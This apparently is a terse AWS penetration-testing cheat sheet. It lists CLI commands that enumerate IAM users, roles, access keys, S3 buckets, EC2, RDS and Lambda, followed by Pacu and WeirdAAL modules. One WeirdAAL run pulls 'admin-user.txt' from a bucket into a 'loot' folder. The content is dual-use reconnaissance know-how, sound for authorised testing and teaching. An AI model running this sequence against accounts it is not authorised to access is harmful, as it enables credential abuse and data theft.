- AWS Command Line https://aws.amazon.com/cli/
- add
--profile=<NAME>
to any command to run it with a specific named profile
- run aws configure with
--profile=<name>
to create a new named profile
aws configure
aws sts get-caller-identity
aws ec2 describe-instances --region <region>
aws iam list-users
aws iam list-roles
aws iam list-access-keys --user-name <username>
aws iam list-roles
aws s3 ls s3://<bucketname>/
aws s3 sync s3://bucketname s3-files-dir
aws ec2 describe-instances
aws deploy list-applications
aws rds describe-db-instances --region <region name>
Knowing the VPC Security Group ID (returned in the RDS instance description above), you can query the group's inbound and outbound rules to determine which sources can reach the database.
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
aws lambda list-functions --region <region>
aws lambda get-function --function-name <lambda function>
aws ec2 describe-subnets
aws ec2 describe-network-interfaces
aws directconnect describe-connections
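# Pacu modules and commands, run from inside a Pacu session; the enumeration modules issue IAM List*/Get* API calls, which are recorded in CloudTrail
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami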
cp env.sample .env
nano .env
# Add the following contents (aws_session_token is only needed for temporary credentials; keep .env out of version control):
[default]
aws_access_key_id = <Access-key>
aws_secret_access_key = <Secret-access-key>
aws_session_token = <Session-Token>
python3 weirdAAL.py -m recon_all -t ssrf
python3 weirdAAL.py -m list_services_by_key -t ssrf
python3 weirdAAL.py -m s3_get_bucket_policy -a <s3 bucket> -t ssrf
python3 weirdAAL.py -m s3_download_file -a '<s3 bucket>','admin-user.txt' -t ssrf
cat loot/<s3 bucket name>/admin-user.txt